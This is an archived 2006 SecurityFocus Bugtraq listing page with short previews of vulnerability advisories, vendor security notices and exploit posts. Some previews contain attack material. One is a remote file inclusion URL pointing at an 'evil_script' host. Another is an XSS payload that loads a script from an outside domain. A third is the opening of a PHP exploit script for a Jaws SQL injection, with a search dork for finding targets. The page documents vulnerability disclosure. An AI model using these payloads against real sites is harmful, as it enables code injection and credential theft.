SecurityFocus

CrisoftRicette<<--1.0pre15b Remote File Inclusion 2006-06-27
CrAzY CrAcKeR hotmail com

================================

Discovered By: CrAzY CrAcKeR

Email:CrAzY.CrAcKeR (at) hotmail (dot) com [email concealed]

================================

Example:-

/recipe/cookbook.php?crisoftricette=http://evil_script

[ more ] [ reply ]

Re: [ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion 2006-06-27
Steven M. Christey (coley mitre org)

>Successful exploitation requires that "register_globals= Off ".

That seems very strange, doesn't it?

Especially if you look at the source code.

Let's start with search.php, one of the vulnerable vectors:

<?php

...

require ("init.inc");

and in init.inc:

require ("globals.inc");

.

[ more ] [ reply ]

[SECURITY] [DSA 1103-1] New Linux kernel 2.6.8 packages fix several vulnerabilities 2006-06-27
Moritz Muehlenhoff (jmm debian org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1103-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Dann Frazier, Troy Heber
June 27th, 2006

[ more ] [ reply ]

[USN-305-1] OpenLDAP vulnerability 2006-06-27
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-305-1 June 27, 2006
openldap2, openldap2.2 vulnerability
CVE-2006-2754
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.0

[ more ] [ reply ]

[USN-306-1] MySQL 4.1 vulnerability 2006-06-27
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-306-1 June 27, 2006
mysql-dfsg-4.1 vulnerability
CVE-2006-3081
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.10

This

[ more ] [ reply ]

Usenet Script v0.5 2006-06-25
luny youfucktard com

Usenet Script v0.5

Homepage:

http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a fronten

[ more ] [ reply ]

Windows Live Messenger 8.0 ( Contact List *.ctt ) Heap Overflow 2006-06-25
Alexander Hristov (joffer gmail com)

Author: JAAScois
Date: 25.6.2006
Type: Heap Overflow
Product: http://live.com , http://messenger.msn.com
Patch: N/A
Link : http://securitydot.net/xpl/exploits/vulnerabilities/articles/1108/exploi
t.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securi

[ more ] [ reply ]

error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2 2006-06-25
cxib securityreason com

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- -Written: 10.6.2006

- -Public: 26.06.2006

from SECURITYREASON.COM

CVE-2006-3011

- --- 0.Description ---

PHP is an HTML-embedded scripting

[ more ] [ reply ]

Winged Gallery v1.0 2006-06-24
luny youfucktard com

Winged Gallery v1.0

Homepage:

http://winged.info/index.php?p=gallery

XSS vuln on thumb.php:

http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+i
con.jpg">''>">">"><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><
"<'<'<'<'&size=75&type=2&w=128&h=128">''>">">">

[ more ] [ reply ]

Jaws <= 0.6.2 'Search gadget' SQL injection 2006-06-26
rgod autistici org

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Jaws <= 0.6.2 'Search gadget' SQL injection / admin credentials disclosure\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gad

[ more ] [ reply ]

Taking Over Laptops by Fuzzing Wireless Drivers 2006-06-25
Gadi Evron (ge linuxbox org)

Some news items showed up in the past couple of days about vulnerabilities
in wireless device drivers. These vulnerabilities were apparently found by
the use of a 802.11 Fuzzing tool called lorcon
(http://www.802.11mercenary.net/lorcon/).

Apparently, David Maynor and Jon Ellch intend to demonstrate

[ more ] [ reply ]

Amazon, MSN vulns and.. Yes, we know! Most sites have vulnerabilities 2006-06-24
Gadi Evron (ge linuxbox org)

In this post I link to a blog entry by a guy (dcrab) who does some show
and tell about Amazon and MSN. You gotta love Full Disclosure. Full
Disclosure and why bugtraq is here is what I talk about. Just skip my text
to the end for that information.

So, yes, we know. Thanks. Yes, we know. Most sites

[ more ] [ reply ]

Universal Hooker - Tool release 2006-06-26
Hernan Ochoa (lists core-sdi com)

Hi,

I'm releasing a tool called 'Universal Hooker'. This version is
implemented as an ollydbg plugin.
The tool is available at http://oss.coresecurity.com/projects/uhooker.htm.
Documentation is available at
http://oss.coresecurity.com/uhooker/doc/index.html.
Any feedback is very welcome.

Here's a

[ more ] [ reply ]

Amazon and Msn vulnerabilities 2006-06-23
dcrab hackerscenter com

For the complete article read, http://blogs.hackerscenter.com/dcrab/?p=19

Amazon.com: One of the largest e-commerce websites in the world. It is vulnerable to CR LF injection vulnerabilities, that allow an exploitable XSS situation to exist

Screenshot:

http://blogs.hackerscenter.com/dcrab/a

[ more ] [ reply ]

[OpenPKG-SA-2006.010] OpenPKG Security Advisory (gnupg) 2006-06-26
OpenPKG (openpkg openpkg org)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory The OpenPKG Project
http://www.openpkg.org/security/ http://www.openpkg.org
openpkg-security (at) openpkg (dot) org [email concealed]

[ more ] [ reply ]

Undisclosed cross site scripting vulnerabilities in domaintools.com - requesting contacts 2006-06-25
admin majorsecurity de

Hi there.

I found some vulnerabilities on the page of domaintools.com.

Unfortunelly I couldn't find any interesting contacts like e-mail adresses

or something else to report the vulnerability.

Is there someone who got some information on how to contact them?

Thank you for your attention.

[ more ] [ reply ]

OpenGuestbook Cross Site Scripting & SQL Injection 2006-06-25
simo64 gmail com

Produce : Open Guestbook 0.5

Site : http://sourceforge.net/projects/openguestbook

Discovred by: Moroccan Security Team (Simo64)

Greetz to : And All Friends :)

Details :

=========

[+]Cross Site Scripting

************************

[-]vulnerable code in header.php on line 5

[ more ] [ reply ]

GlobeTrotter Mobility Manager - security issue 2006-06-23
dzelek gmail com

Discovered by Damian Zelek -> [03 April 2006]

Published -> [23 June 2006]

Vendor was informed -> [24 April 2006]

Vendors answer -> "We will talk with our Department of Software" :-D

Summary:

GlobeTrotter Mobility Manager is a unique PC software solution that enables fast, simple and ea

[ more ] [ reply ]

Mailenable SMTP Service DoS 2006-06-24
db0 (divisionbyzerodotbe gmail com)

Mailenable is vulnerable due to an error in the handling of the "HELO"
command in the SMTP service.

Product: Mailenable SMTP Service, All versions
Vuln type: Denial of Service
Risk: moderated
Attack type: Remote
Tested on: Windows 2003
Vendor patch: http://www.mailenable.com/hotfix/default.asp: ME-

[ more ] [ reply ]

[KAPDA]MyBB1.1.3~Option update for code buttons~Sql Injection Admin Access 2006-06-23
addmimistrator gmail com

ORIGINAL ADVISORY:

http://myimei.com/security/2006-06-21/mybb113option-update-for-code-butt
onssql-injection-admin-access.html

http://KAPDA.ir

??????-Summary?????-

Software: MyBB

Sowtware?s Web Site: http://www.mybboard.com

Versions: 1.1.3

Class: Remote

Status: Patched

Exploit: Available

Di

[ more ] [ reply ]